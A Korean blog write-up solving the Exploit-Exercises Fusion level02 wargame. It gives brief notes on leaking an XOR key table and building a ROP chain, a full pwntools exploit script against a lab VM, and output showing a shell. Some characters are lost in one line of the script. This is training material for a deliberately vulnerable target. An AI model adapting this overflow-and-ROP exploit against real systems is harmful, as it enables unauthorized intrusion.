본문 바로가기

Wargames/Exploit-Exercises

[Exploit-Exercise] Fusion level02

Fusion Level02

- There is xor encryption with random value. First getting xor table.

- just ROP!. leaking write() address and get system() address with 'offset'.

- i just use system(). There is another way to get shell. execve()

- Using execve() would be more cleaner and comfortable for making payload.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
from pwn import *
 
def send_data(payload):
    s.send("E" + p32(len(payload)) + payload)
 
def leak_xor_table():
    send_data("\x00"*128)
 
    s.recv(1024)
    return s.recv(1024)[-128:]
 
def encrypt(payload, table):
    enc = ""
    for i in range(len(payload)):
        enc += chr(ord(table[i%128])^ord(payload[i]))
    return enc
 
cmd = "/bin/sh\x00"
pppr = 0x80499bd
bss = 0x804b420 + 4
read_plt = 0x8048860
write_plt = 0x80489c0
write_got = 0x804b3dc
write_system = 0x847a0
 
= remote('192.168.56.136'20002)
 
s.recv(1024)
 
table = leak_xor_table()
 
payload = "A"*(0x20000 + 0x10)
 
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(cmd))
# read(0, &bss, 8)
 
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(write_got)
payload += p32(4)
# write(1, write_got, 4)
 
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)
# read(0, write_got, 4)
 
payload += p32(write_plt)
payload += "AAAA"
payload += p32(bss)
# write(bss) -> system(bss) # system("/bin/sh")
 
payload = encrypt(payload, table)
 
send_data(payload)
s.recv(1024)
 
recv = 0
while recv < len(payload):
        recv += len(s.recv(65536))
 
s.send("Q")
s.send(cmd)
 
write = u32(s.recv(4))
print "[+] Write  : %s" % hex(write)
system = write - write_system
print "[+] System : %s" % hex(system)
 
s.send(p32(system))
s.interactive()
cs

1
2
3
4
5
6
7
zero@ubuntu:~/Desktop$ python fusion.py
[+] Opening connection to 192.168.56.136 on port 20002: Done
[+] Write  : 0xb77202c0
[+] System : 0xb769bb20
[*] Switching to interactive mode
$ id
uid=20002 gid=20002 groups=20002
cs


'Wargames > Exploit-Exercises' 카테고리의 다른 글

[Exploit-Exercise] Fusion level01  (1) 2016.08.29
[Exploit-Exercise] Fusion level00  (0) 2016.08.29
[Exploit-Exercise] Nubula Solutions  (0) 2015.11.25